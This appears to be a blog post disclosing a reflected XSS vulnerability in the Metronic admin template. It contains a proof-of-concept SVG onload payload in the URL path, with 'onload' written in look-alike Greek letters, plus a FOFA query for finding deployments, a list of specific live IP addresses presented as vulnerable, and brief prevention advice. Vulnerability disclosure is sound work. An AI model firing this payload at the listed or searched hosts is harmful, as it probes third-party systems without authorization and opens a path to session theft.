Metronic-XSS

⃟?⃟?⃟?⃟?⃟?⃟

已于 2024-09-04 21:26:31 修改

阅读量627

点赞数 11

文章标签：前端

于 2024-09-04 21:04:34 首次发布

本文链接：https://blog.csdn.net/qq_45744104/article/details/141903463

版权

1、Vulnerability system

Metronic - Responsive Admin Dashboard Template is a responsive website backend management template based on the Bootstrap framework. As an excellent responsive website backend management template, it has a beautiful interface, powerful features, and perfect mobile device responsiveness. Metronic has a simple and elegant Metro UI style interface, 6 interface colors, 76 template pages, including various components required for backend management projects such as charts, tables, maps, message centers, monitoring panels, etc. It is truly a high-end and functionally compatible responsive website backend management template. This template has reflective XSS.

2、The system interface built using the Metronic template is as follows:

3、There is a reflective XSS on the homepage

POC:/<svg%20οnlοad=alert(123)>

Vulnerability reproduction: Direct browser access to IP+POC

4、Scope of Impact: Impact System 1000+

Browser access：https://fofa.info/result?qbase64=YXBwPSJNRVRST05JQy1BZG1pbi1UaGVtZSIg

Fofa Search：app="METRONIC-Admin-Theme"

5、such as:

http://47.98.55.69:8080/<svg%20οnlοad=alert(123)>
http://101.42.46.89:8080/<svg%20οnlοad=alert(123)>
http://115.29.214.168:8080/<svg%20οnlοad=alert(123)>
http://116.62.147.0:8080/<svg%20οnlοad=alert(123)>
http://124.71.181.91:8080/<svg%20οnlοad=alert(123)>
https://117.50.110.6/<svg%20οnlοad=alert(123)>
.......
6、harm:

Reflective XSS (Cross Site scripting) is a common network security vulnerability where attackers inject malicious scripts into web pages and exploit the user's browser to execute these scripts. The hazards mainly include:

1. Stealing User Information: Attackers can obtain sensitive user information such as cookies, session tokens, etc. through malicious scripts, thereby hijacking user accounts.

2. * * Falsifying requests * *: Attackers can exploit XSS vulnerabilities to forge user requests and perform unauthorized operations, such as transferring funds, modifying account information, etc.

To prevent reflective XSS, developers should take the following measures:

-* * Input verification * *: Strictly verify and filter user input.
-Output Encoding: When outputting user input to a webpage, perform appropriate encoding (such as HTML encoding).